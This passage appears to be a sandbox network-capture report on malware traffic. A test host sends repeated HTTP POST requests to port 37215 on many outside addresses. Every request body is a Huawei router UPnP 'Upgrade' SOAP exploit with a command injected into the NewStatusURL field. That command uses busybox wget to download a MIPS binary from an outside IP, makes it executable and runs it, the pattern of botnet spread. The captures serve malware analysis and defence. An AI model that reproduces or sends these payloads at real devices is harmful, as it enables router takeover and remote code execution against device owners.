74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    416192.168.2.235769241.237.153.22937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261655092 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    417192.168.2.2359268197.115.193.13937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261703968 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    418192.168.2.2349726156.207.173.14537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261749983 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    419192.168.2.235235241.12.1.24337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261790991 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    420192.168.2.2359374197.244.184.15637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261842012 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    421192.168.2.2347172156.112.193.4837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261955023 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    422192.168.2.2334410197.138.203.25037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262015104 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    423192.168.2.233867241.144.238.8337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262105942 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    424192.168.2.2335928156.189.243.537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262142897 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    425192.168.2.2356490197.89.180.12037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262187958 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    426192.168.2.233918241.101.17.22337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262262106 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
